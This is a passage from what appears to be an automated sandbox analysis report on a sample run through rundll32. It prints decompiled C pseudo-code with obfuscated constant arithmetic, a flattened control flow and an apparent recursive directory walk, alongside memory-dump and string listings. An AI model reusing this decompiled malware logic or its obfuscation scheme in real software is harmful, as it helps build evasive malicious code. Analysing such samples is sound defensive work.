                                                                                                                      • Instruction ID: ac3992311d77938230219bd7494410f3300a6517a75328f28b6a2d0a96b47cd1
                                                                                                                      • Opcode Fuzzy Hash: cb892dbf0e02d5c680a1bc3735fc6967582ad95351359404022272d1af05de5b
                                                                                                                      • Instruction Fuzzy Hash: 29221E715087819FD368CF25C486A9BBBF2FBC4758F10891DF69A8A260D7B18949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0018ACD3(intOrPtr* __ecx) {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr* _v12;
                                                                                                                      				char _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				void* _t358;
                                                                                                                      				void* _t359;
                                                                                                                      				intOrPtr _t360;
                                                                                                                      				void* _t366;
                                                                                                                      				void* _t375;
                                                                                                                      				signed int _t378;
                                                                                                                      				signed int _t379;
                                                                                                                      				signed int _t380;
                                                                                                                      				signed int _t381;
                                                                                                                      				signed int _t382;
                                                                                                                      				signed int _t383;
                                                                                                                      				signed int _t384;
                                                                                                                      				signed int _t385;
                                                                                                                      				intOrPtr* _t426;
                                                                                                                      				intOrPtr _t430;
                                                                                                                      				signed int* _t431;
                                                                                                                      
                                                                                                                      				_t431 =  &_v160;
                                                                                                                      				_t426 = __ecx;
                                                                                                                      				_v12 = __ecx;
                                                                                                                      				_v8 = 0x8c571a;
                                                                                                                      				_t430 = 0;
                                                                                                                      				_t375 = 0x79707ab;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v64 = 0xfc5ff;
                                                                                                                      				_v64 = _v64 >> 6;
                                                                                                                      				_v64 = _v64 ^ 0x00003f17;
                                                                                                                      				_v140 = 0x873397;
                                                                                                                      				_v140 = _v140 * 0x50;
                                                                                                                      				_v140 = _v140 << 5;
                                                                                                                      				_v140 = _v140 << 4;
                                                                                                                      				_v140 = _v140 ^ 0x803e6000;
                                                                                                                      				_v112 = 0x5cc448;
                                                                                                                      				_v112 = _v112 | 0xb5fdf5b7;
                                                                                                                      				_v112 = _v112 >> 9;
                                                                                                                      				_v112 = _v112 ^ 0x005afefa;
                                                                                                                      				_v60 = 0x19d054;
                                                                                                                      				_t378 = 0x29;
                                                                                                                      				_v60 = _v60 / _t378;
                                                                                                                      				_v60 = _v60 ^ 0x0000a12d;
                                                                                                                      				_v40 = 0x4c7c9b;
                                                                                                                      				_t379 = 0x7b;
                                                                                                                      				_v40 = _v40 / _t379;
                                                                                                                      				_v40 = _v40 ^ 0x00009f31;
                                                                                                                      				_v88 = 0xb88e01;
                                                                                                                      				_v88 = _v88 << 8;
                                                                                                                      				_v88 = _v88 | 0xb280bd16;
                                                                                                                      				_v88 = _v88 ^ 0xba886110;
                                                                                                                      				_v80 = 0xf71efc;
                                                                                                                      				_v80 = _v80 << 9;
                                                                                                                      				_t380 = 0x34;
                                                                                                                      				_v80 = _v80 / _t380;
                                                                                                                      				_v80 = _v80 ^ 0x04950844;
                                                                                                                      				_v96 = 0xf5fda;
                                                                                                                      				_v96 = _v96 >> 7;
                                                                                                                      				_t381 = 0x11;
                                                                                                                      				_v96 = _v96 * 0x46;
                                                                                                                      				_v96 = _v96 ^ 0x00041aa2;
                                                                                                                      				_v156 = 0x96c5de;
                                                                                                                      				_v156 = _v156 / _t381;
                                                                                                                      				_v156 = _v156 ^ 0x88ccdc31;
                                                                                                                      				_v156 = _v156 * 0x3d;
                                                                                                                      				_v156 = _v156 ^ 0x96be8a04;
                                                                                                                      				_v72 = 0x71396c;
                                                                                                                      				_v72 = _v72 << 0xa;
                                                                                                                      				_v72 = _v72 ^ 0x367e7763;
                                                                                                                      				_v72 = _v72 ^ 0xf298a4dc;
                                                                                                                      				_v148 = 0xd59d39;
                                                                                                                      				_v148 = _v148 >> 6;
                                                                                                                      				_v148 = _v148 + 0xffff0863;
                                                                                                                      				_v148 = _v148 << 4;
                                                                                                                      				_v148 = _v148 ^ 0x0020b4d1;
                                                                                                                      				_v116 = 0x4e2a72;
                                                                                                                      				_v116 = _v116 ^ 0x41f61916;
                                                                                                                      				_t382 = 0x66;
                                                                                                                      				_v116 = _v116 / _t382;
                                                                                                                      				_v116 = _v116 ^ 0xb72c0337;
                                                                                                                      				_v116 = _v116 ^ 0xb7828c59;
                                                                                                                      				_v28 = 0x7f34ff;
                                                                                                                      				_v28 = _v28 << 9;
                                                                                                                      				_v28 = _v28 ^ 0xfe6bca43;
                                                                                                                      				_v124 = 0x9f58a2;
                                                                                                                      				_v124 = _v124 + 0xffff9c37;
                                                                                                                      				_v124 = _v124 + 0x725a;
                                                                                                                      				_v124 = _v124 << 7;
                                                                                                                      				_v124 = _v124 ^ 0x4fb1837f;
                                                                                                                      				_v52 = 0xa9f0c8;
                                                                                                                      				_v52 = _v52 + 0xfffffc3c;
                                                                                                                      				_v52 = _v52 ^ 0x00ad5534;
                                                                                                                      				_v24 = 0xa43c6e;
                                                                                                                      				_t383 = 0x6e;
                                                                                                                      				_v24 = _v24 * 0x5b;
                                                                                                                      				_v24 = _v24 ^ 0x3a644c1a;
                                                                                                                      				_v132 = 0x7fb628;
                                                                                                                      				_v132 = _v132 * 0xb;
                                                                                                                      				_v132 = _v132 << 6;
                                                                                                                      				_v132 = _v132 << 0xd;
                                                                                                                      				_v132 = _v132 ^ 0x9dcf3d61;
                                                                                                                      				_v100 = 0x597f63;
                                                                                                                      				_v100 = _v100 | 0xd4d51309;
                                                                                                                      				_v100 = _v100 << 9;
                                                                                                                      				_v100 = _v100 ^ 0xbafad16c;
                                                                                                                      				_v108 = 0x4d061a;
                                                                                                                      				_v108 = _v108 >> 2;
                                                                                                                      				_v108 = _v108 ^ 0xd197d397;
                                                                                                                      				_v108 = _v108 + 0xffff042d;
                                                                                                                      				_v108 = _v108 ^ 0xd1833bae;
                                                                                                                      				_v20 = 0x2586e5;
                                                                                                                      				_v20 = _v20 + 0x8581;
                                                                                                                      				_v20 = _v20 ^ 0x0026b83c;
                                                                                                                      				_v92 = 0x3ae4f5;
                                                                                                                      				_v92 = _v92 << 1;
                                                                                                                      				_v92 = _v92 << 0xb;
                                                                                                                      				_v92 = _v92 ^ 0xae4bd9c6;
                                                                                                                      				_v44 = 0xe6dc30;
                                                                                                                      				_v44 = _v44 ^ 0xd3982ed3;
                                                                                                                      				_v44 = _v44 ^ 0xd37e8c85;
                                                                                                                      				_v144 = 0xe42628;
                                                                                                                      				_v144 = _v144 | 0xc37700ac;
                                                                                                                      				_v144 = _v144 >> 0xa;
                                                                                                                      				_v144 = _v144 << 0xc;
                                                                                                                      				_v144 = _v144 ^ 0x0fd23fe2;
                                                                                                                      				_v152 = 0x41402a;
                                                                                                                      				_t186 =  &_v152; // 0x41402a
                                                                                                                      				_t384 = 0x19;
                                                                                                                      				_v152 =  *_t186 / _t383;
                                                                                                                      				_v152 = _v152 * 0x6a;
                                                                                                                      				_v152 = _v152 ^ 0x2485591b;
                                                                                                                      				_v152 = _v152 ^ 0x24bff8d4;
                                                                                                                      				_v160 = 0xbf0758;
                                                                                                                      				_v160 = _v160 + 0x522b;
                                                                                                                      				_v160 = _v160 >> 0xe;
                                                                                                                      				_v160 = _v160 + 0xffff65d4;
                                                                                                                      				_v160 = _v160 ^ 0xfff1feea;
                                                                                                                      				_v84 = 0x1a9ecc;
                                                                                                                      				_v84 = _v84 << 0x10;
                                                                                                                      				_t385 = 0x2d;
                                                                                                                      				_v84 = _v84 / _t384;
                                                                                                                      				_v84 = _v84 ^ 0x065118ef;
                                                                                                                      				_v120 = 0x6a6625;
                                                                                                                      				_t219 =  &_v120; // 0x6a6625
                                                                                                                      				_v120 =  *_t219 / _t385;
                                                                                                                      				_v120 = _v120 >> 0xd;
                                                                                                                      				_v120 = _v120 + 0x1650;
                                                                                                                      				_v120 = _v120 ^ 0x00013394;
                                                                                                                      				_v76 = 0x6cd503;
                                                                                                                      				_v76 = _v76 + 0xffff64c6;
                                                                                                                      				_v76 = _v76 * 0x17;
                                                                                                                      				_v76 = _v76 ^ 0x09bb62c3;
                                                                                                                      				_v128 = 0x4363ee;
                                                                                                                      				_v128 = _v128 | 0x70162fad;
                                                                                                                      				_v128 = _v128 * 0x15;
                                                                                                                      				_v128 = _v128 + 0xffff87d6;
                                                                                                                      				_v128 = _v128 ^ 0x372e6b7a;
                                                                                                                      				_v36 = 0xd9ddf9;
                                                                                                                      				_v36 = _v36 << 5;
                                                                                                                      				_v36 = _v36 ^ 0x1b34c995;
                                                                                                                      				_v136 = 0xc7126f;
                                                                                                                      				_v136 = _v136 << 3;
                                                                                                                      				_v136 = _v136 >> 6;
                                                                                                                      				_v136 = _v136 + 0x2e5f;
                                                                                                                      				_v136 = _v136 ^ 0x001d82e9;
                                                                                                                      				_v104 = 0x7714f2;
                                                                                                                      				_v104 = _v104 << 2;
                                                                                                                      				_v104 = _v104 * 5;
                                                                                                                      				_t358 = 0x5786d8d;
                                                                                                                      				_v104 = _v104 | 0x0a59959c;
                                                                                                                      				_v104 = _v104 ^ 0x0b5ace50;
                                                                                                                      				_v68 = 0x585054;
                                                                                                                      				_v68 = _v68 ^ 0x33c1c88e;
                                                                                                                      				_v68 = _v68 ^ 0x9bceaa07;
                                                                                                                      				_v68 = _v68 ^ 0xa855990f;
                                                                                                                      				_v56 = 0xa2136b;
                                                                                                                      				_v56 = _v56 + 0x4ebb;
                                                                                                                      				_v56 = _v56 ^ 0x00a98962;
                                                                                                                      				_v32 = 0x51a57b;
                                                                                                                      				_v32 = _v32 >> 0xe;
                                                                                                                      				_v32 = _v32 ^ 0x0002096e;
                                                                                                                      				_v48 = 0x9fd766;
                                                                                                                      				_v48 = _v48 | 0x00a10b6a;
                                                                                                                      				_v48 = _v48 ^ 0x00bfd9fa;
                                                                                                                      				do {
                                                                                                                      					while(_t375 != _t358) {
                                                                                                                      						if(_t375 == 0x79707ab) {
                                                                                                                      							_t375 = 0x7c4530c;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t375 == 0x7c4530c) {
                                                                                                                      								_push(_v156);
                                                                                                                      								_push(_v96);
                                                                                                                      								_push(0x171678);
                                                                                                                      								_t366 = E0017AB66(_v88, _v80, __eflags);
                                                                                                                      								_push(_v28);
                                                                                                                      								_push(_v116);
                                                                                                                      								_t302 =  &_v148; // 0x372e6b7a
                                                                                                                      								_push(0x171538);
                                                                                                                      								__eflags = E00180EDA(E0017AB66(_v72,  *_t302, __eflags), _v64, _v124, _t366,  &_v16, _v52, _v24) - _v140;
                                                                                                                      								_t375 =  ==  ? 0x5786d8d : 0xbb932f6;
                                                                                                                      								E0017AE03(_v132, _v100, _v108, _t366);
                                                                                                                      								E0017AE03(_v20, _v92, _v44, _t367);
                                                                                                                      								_t426 = _v12;
                                                                                                                      								_t431 =  &(_t431[0xf]);
                                                                                                                      								L10:
                                                                                                                      								_t358 = 0x5786d8d;
                                                                                                                      								goto L11;
                                                                                                                      							} else {
                                                                                                                      								if(_t375 != 0xfc0b370) {
                                                                                                                      									goto L11;
                                                                                                                      								} else {
                                                                                                                      									E00177027(_v32, _v40, _v16, _v48);
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L6:
                                                                                                                      						return _t430;
                                                                                                                      					}
                                                                                                                      					_push(_v84);
                                                                                                                      					_push(_v160);
                                                                                                                      					_push(0x171588);
                                                                                                                      					_t359 = E0017AB66(_v144, _v152, __eflags);
                                                                                                                      					_t360 =  *0x195c9c; // 0x0
                                                                                                                      					__eflags = E0018F9E2(_v112, _v120, _v16,  *_t426, _v76, _v144, _v128,  *((intOrPtr*)(_t426 + 4)), _v36, _v136, _t359, _t360 + 8) - _v60;
                                                                                                                      					_t375 = 0xfc0b370;
                                                                                                                      					_t430 =  ==  ? 1 : _t430;
                                                                                                                      					E0017AE03(_v104, _v68, _v56, _t359);
                                                                                                                      					_t431 =  &(_t431[0xf]);
                                                                                                                      					goto L10;
                                                                                                                      					L11:
                                                                                                                      					__eflags = _t375 - 0xbb932f6;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L6;
                                                                                                                      			}




























































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %fj$(&$*@A$+R$TPX$_.$cw~6$r*N$zk.7
                                                                                                                      • API String ID: 0-4179132742
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Version$ClipboardFormatRegister
                                                                                                                      • String ID: MSWHEEL_ROLLMSG
                                                                                                                      • API String ID: 2888461884-2485103130
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 81%
                                                                                                                      			E00171950(void* __ecx, void* __edx, void* __eflags, signed int _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				unsigned int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				intOrPtr _v156;
                                                                                                                      				char _v176;
                                                                                                                      				short _v720;
                                                                                                                      				short _v722;
                                                                                                                      				char _v724;
                                                                                                                      				signed int _v768;
                                                                                                                      				char _v1288;
                                                                                                                      				char _v1808;
                                                                                                                      				void* _t335;
                                                                                                                      				signed int _t360;
                                                                                                                      				signed int _t362;
                                                                                                                      				intOrPtr _t371;
                                                                                                                      				void* _t373;
                                                                                                                      				signed int _t379;
                                                                                                                      				void* _t406;
                                                                                                                      				signed int _t418;
                                                                                                                      				signed int _t419;
                                                                                                                      				signed int _t420;
                                                                                                                      				signed int _t421;
                                                                                                                      				signed int _t422;
                                                                                                                      				signed int _t423;
                                                                                                                      				void* _t426;
                                                                                                                      				void* _t427;
                                                                                                                      
                                                                                                                      				_t371 = _a8;
                                                                                                                      				_push(_a20);
                                                                                                                      				if(__eflags == 0) {
                                                                                                                      					_push(_a16);
                                                                                                                      					_push(_a12);
                                                                                                                      					_push(_t371);
                                                                                                                      					_push(_a4);
                                                                                                                      					_push(__edx);
                                                                                                                      					_push(__ecx);
                                                                                                                      					E0017CF25(_t335);
                                                                                                                      					_v16 = 0x6f572e;
                                                                                                                      				}
                                                                                                                      				_t427 = _t426 + 0x1c;
                                                                                                                      				_v16 = _v16 >> 0xb;
                                                                                                                      				_v16 = _v16 + 0xd52f;
                                                                                                                      				_t373 = 0x80f983c;
                                                                                                                      				_v16 = _v16 ^ 0x3310f03a;
                                                                                                                      				_v16 = _v16 ^ 0x33101333;
                                                                                                                      				_v60 = 0xed71dd;
                                                                                                                      				_v60 = _v60 ^ 0x2497a453;
                                                                                                                      				_t418 = 0x26;
                                                                                                                      				_v60 = _v60 * 0x72;
                                                                                                                      				_v60 = _v60 ^ 0x3eb60fda;
                                                                                                                      				_v112 = 0xa5b0b2;
                                                                                                                      				_v112 = _v112 + 0x8954;
                                                                                                                      				_v112 = _v112 ^ 0x00ada628;
                                                                                                                      				_v108 = 0xe5587e;
                                                                                                                      				_v108 = _v108 << 9;
                                                                                                                      				_v108 = _v108 ^ 0xcab3bbf0;
                                                                                                                      				_v92 = 0x4845fb;
                                                                                                                      				_v92 = _v92 + 0x365f;
                                                                                                                      				_v92 = _v92 + 0xdd1a;
                                                                                                                      				_v92 = _v92 ^ 0x004e95c0;
                                                                                                                      				_v88 = 0xa51f24;
                                                                                                                      				_v88 = _v88 ^ 0x4dc3992d;
                                                                                                                      				_v88 = _v88 >> 9;
                                                                                                                      				_v88 = _v88 ^ 0x002183c7;
                                                                                                                      				_v28 = 0x92b1f2;
                                                                                                                      				_v28 = _v28 + 0xdb28;
                                                                                                                      				_v28 = _v28 ^ 0xc5c4fb2d;
                                                                                                                      				_v28 = _v28 + 0xffff07a3;
                                                                                                                      				_v28 = _v28 ^ 0xc5543e55;
                                                                                                                      				_v56 = 0x45fcf7;
                                                                                                                      				_v56 = _v56 ^ 0x18f8a820;
                                                                                                                      				_v56 = _v56 / _t418;
                                                                                                                      				_v56 = _v56 ^ 0x00a79737;
                                                                                                                      				_v72 = 0xd5567a;
                                                                                                                      				_v72 = _v72 ^ 0x96c46f64;
                                                                                                                      				_v72 = _v72 + 0x1123;
                                                                                                                      				_v72 = _v72 ^ 0x96131221;
                                                                                                                      				_v128 = 0xd7fcd2;
                                                                                                                      				_v128 = _v128 | 0x19fc7ba7;
                                                                                                                      				_v128 = _v128 ^ 0x19f2013f;
                                                                                                                      				_v36 = 0xb63dda;
                                                                                                                      				_v36 = _v36 | 0x57c3443c;
                                                                                                                      				_v36 = _v36 >> 0xf;
                                                                                                                      				_v36 = _v36 >> 2;
                                                                                                                      				_v36 = _v36 ^ 0x000375d9;
                                                                                                                      				_v120 = 0x9784e5;
                                                                                                                      				_v120 = _v120 ^ 0x5442b457;
                                                                                                                      				_v120 = _v120 ^ 0x54d2e3fe;
                                                                                                                      				_v152 = 0x86b47c;
                                                                                                                      				_v152 = _v152 | 0x1a648f0d;
                                                                                                                      				_v152 = _v152 ^ 0x1ae2f95e;
                                                                                                                      				_v104 = 0xe16033;
                                                                                                                      				_v104 = _v104 + 0xffff0503;
                                                                                                                      				_v104 = _v104 ^ 0x00e7872e;
                                                                                                                      				_v140 = 0x7ced29;
                                                                                                                      				_v140 = _v140 + 0x937a;
                                                                                                                      				_v140 = _v140 ^ 0x00718bd8;
                                                                                                                      				_v148 = 0xa848b7;
                                                                                                                      				_v148 = _v148 ^ 0xa8d47762;
                                                                                                                      				_v148 = _v148 ^ 0xa87b6210;
                                                                                                                      				_v124 = 0xc4055c;
                                                                                                                      				_v124 = _v124 << 5;
                                                                                                                      				_v124 = _v124 ^ 0x1882bddf;
                                                                                                                      				_v80 = 0x58e97;
                                                                                                                      				_t419 = 0x7c;
                                                                                                                      				_v80 = _v80 / _t419;
                                                                                                                      				_v80 = _v80 + 0xffff9366;
                                                                                                                      				_v80 = _v80 ^ 0xfffe01cd;
                                                                                                                      				_v48 = 0x77db93;
                                                                                                                      				_t420 = 0x3a;
                                                                                                                      				_v48 = _v48 / _t420;
                                                                                                                      				_v48 = _v48 + 0xffffa5b4;
                                                                                                                      				_v48 = _v48 >> 6;
                                                                                                                      				_v48 = _v48 ^ 0x00036e08;
                                                                                                                      				_v132 = 0x4854bc;
                                                                                                                      				_t421 = 0x4c;
                                                                                                                      				_v132 = _v132 * 0x24;
                                                                                                                      				_v132 = _v132 ^ 0x0a23127f;
                                                                                                                      				_v84 = 0x297997;
                                                                                                                      				_v84 = _v84 / _t421;
                                                                                                                      				_t422 = 0x45;
                                                                                                                      				_v84 = _v84 * 0x5e;
                                                                                                                      				_v84 = _v84 ^ 0x003e8360;
                                                                                                                      				_v24 = 0xba7a12;
                                                                                                                      				_v24 = _v24 << 9;
                                                                                                                      				_v24 = _v24 ^ 0x8e2fa782;
                                                                                                                      				_v24 = _v24 + 0xffffcaa3;
                                                                                                                      				_v24 = _v24 ^ 0xfad920cc;
                                                                                                                      				_v64 = 0xf87d94;
                                                                                                                      				_v64 = _v64 >> 3;
                                                                                                                      				_v64 = _v64 >> 4;
                                                                                                                      				_v64 = _v64 ^ 0x0002c2de;
                                                                                                                      				_v68 = 0x627eea;
                                                                                                                      				_v68 = _v68 >> 0xe;
                                                                                                                      				_v68 = _v68 | 0x4b478a8f;
                                                                                                                      				_v68 = _v68 ^ 0x4b4b50ae;
                                                                                                                      				_v32 = 0x4d9af3;
                                                                                                                      				_v32 = _v32 + 0xffff3fdf;
                                                                                                                      				_v32 = _v32 | 0x07023235;
                                                                                                                      				_v32 = _v32 ^ 0xa9cb8ace;
                                                                                                                      				_v32 = _v32 ^ 0xae825d6e;
                                                                                                                      				_v144 = 0x2c231c;
                                                                                                                      				_v144 = _v144 ^ 0x372f588c;
                                                                                                                      				_v144 = _v144 ^ 0x37050cc1;
                                                                                                                      				_v40 = 0xed36d5;
                                                                                                                      				_v40 = _v40 / _t422;
                                                                                                                      				_v40 = _v40 + 0xffff2e56;
                                                                                                                      				_v40 = _v40 * 0xd;
                                                                                                                      				_v40 = _v40 ^ 0x002f5a10;
                                                                                                                      				_v20 = 0xb226b9;
                                                                                                                      				_v20 = _v20 << 5;
                                                                                                                      				_v20 = _v20 ^ 0x7ec33512;
                                                                                                                      				_v20 = _v20 ^ 0x86eef9df;
                                                                                                                      				_v20 = _v20 ^ 0xee6f0a5e;
                                                                                                                      				_v76 = 0xa2d2;
                                                                                                                      				_v76 = _v76 + 0xffff2403;
                                                                                                                      				_v76 = _v76 + 0xffff5c56;
                                                                                                                      				_v76 = _v76 ^ 0xfff84be5;
                                                                                                                      				_v12 = 0x61529e;
                                                                                                                      				_v12 = _v12 + 0x826f;
                                                                                                                      				_v12 = _v12 | 0x315ab852;
                                                                                                                      				_v12 = _v12 >> 0xa;
                                                                                                                      				_v12 = _v12 ^ 0x0008d08d;
                                                                                                                      				_v136 = 0xbe89c0;
                                                                                                                      				_v136 = _v136 ^ 0x9f3b785a;
                                                                                                                      				_v136 = _v136 ^ 0x9f8a2ffd;
                                                                                                                      				_v116 = 0x9615af;
                                                                                                                      				_v116 = _v116 | 0x7dcb4113;
                                                                                                                      				_v116 = _v116 ^ 0x7dd5a359;
                                                                                                                      				_v100 = 0x787e8d;
                                                                                                                      				_t423 = 0xf;
                                                                                                                      				_v100 = _v100 * 0x78;
                                                                                                                      				_v100 = _v100 ^ 0x3874d75c;
                                                                                                                      				_v96 = 0xce992e;
                                                                                                                      				_v96 = _v96 << 9;
                                                                                                                      				_v96 = _v96 | 0x5045bce0;
                                                                                                                      				_v96 = _v96 ^ 0xdd755c45;
                                                                                                                      				_v52 = 0xe3c541;
                                                                                                                      				_t417 = _v100;
                                                                                                                      				_v52 = _v52 / _t423;
                                                                                                                      				_v52 = _v52 + 0xffff4fb9;
                                                                                                                      				_v52 = _v52 | 0x0dbfd8b3;
                                                                                                                      				_v52 = _v52 ^ 0x0db5e533;
                                                                                                                      				_v44 = 0xd3f0eb;
                                                                                                                      				_v44 = _v44 | 0x02fbd4da;
                                                                                                                      				_v44 = _v44 >> 6;
                                                                                                                      				_v44 = _v44 + 0xffffa89e;
                                                                                                                      				_v44 = _v44 ^ 0x000772a1;
                                                                                                                      				while(1) {
                                                                                                                      					L5:
                                                                                                                      					_t406 = 0x2e;
                                                                                                                      					L6:
                                                                                                                      					while(_t373 != 0xcf103a) {
                                                                                                                      						if(_t373 == 0x80f983c) {
                                                                                                                      							_v156 = _t371;
                                                                                                                      							_t373 = 0xcf103a;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t373 == 0x8bdeaee) {
                                                                                                                      							__eflags = _v768 & _v16;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_t360 = _a16( &_v768,  &_v176);
                                                                                                                      								asm("sbb ecx, ecx");
                                                                                                                      								_t379 =  ~_t360 & 0x01058edd;
                                                                                                                      								L13:
                                                                                                                      								_t373 = _t379 + 0xe9f3001;
                                                                                                                      								while(1) {
                                                                                                                      									L5:
                                                                                                                      									_t406 = 0x2e;
                                                                                                                      									goto L6;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								__eflags = _v724 - _t406;
                                                                                                                      								if(_v724 != _t406) {
                                                                                                                      									L22:
                                                                                                                      									__eflags = _a4;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_push(_v48);
                                                                                                                      										_push(_v80);
                                                                                                                      										_push(0x171264);
                                                                                                                      										E0017E7CE(E0017AB66(_v148, _v124, __eflags), __eflags, _v132, _t371, _v148, _v84, _v24, _v64, _v68,  &_v724);
                                                                                                                      										_t310 =  &_a12; // 0xee6f0a5e
                                                                                                                      										E00171950(_v32, _v144, __eflags, _a4,  &_v1808,  *_t310, _a16, _v40);
                                                                                                                      										_t427 = _t427 + 0x40;
                                                                                                                      										_t362 = E0017AE03(_v20, _v76, _v12, _t365);
                                                                                                                      										_t406 = 0x2e;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									__eflags = _v722;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										__eflags = _v722 - _t406;
                                                                                                                      										if(_v722 != _t406) {
                                                                                                                      											goto L22;
                                                                                                                      										} else {
                                                                                                                      											__eflags = _v720;
                                                                                                                      											if(__eflags != 0) {
                                                                                                                      												goto L22;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								_t373 = 0xfa4bede;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							L31:
                                                                                                                      						}
                                                                                                                      						if(_t373 != 0x8fff290) {
                                                                                                                      							if(_t373 == 0xe9f3001) {
                                                                                                                      								return E00188C35(_v100, _t417, _v96, _v52, _v44);
                                                                                                                      							}
                                                                                                                      							if(_t373 != 0xfa4bede) {
                                                                                                                      								L27:
                                                                                                                      								__eflags = _t373 - 0x71f77cc;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									return _t362;
                                                                                                                      								}
                                                                                                                      								goto L31;
                                                                                                                      							} else {
                                                                                                                      								_t277 =  &_v768; // 0x15f5595f
                                                                                                                      								_t362 = E0018F7FC(_v136, _t417, _v116, _t277);
                                                                                                                      								asm("sbb ecx, ecx");
                                                                                                                      								_t379 =  ~_t362 & 0xfa1ebaed;
                                                                                                                      								goto L13;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						_t362 = E0018BAEA( &_v1288, _v152,  &_v768, _v104, _v140);
                                                                                                                      						_t417 = _t362;
                                                                                                                      						_t427 = _t427 + 0xc;
                                                                                                                      						__eflags = _t362 - 0xffffffff;
                                                                                                                      						if(__eflags != 0) {
                                                                                                                      							_t373 = 0x8bdeaee;
                                                                                                                      							goto L5;
                                                                                                                      						}
                                                                                                                      						return _t362;
                                                                                                                      						goto L31;
                                                                                                                      					}
                                                                                                                      					_push(_v92);
                                                                                                                      					_push(_v108);
                                                                                                                      					_push(0x1712d4);
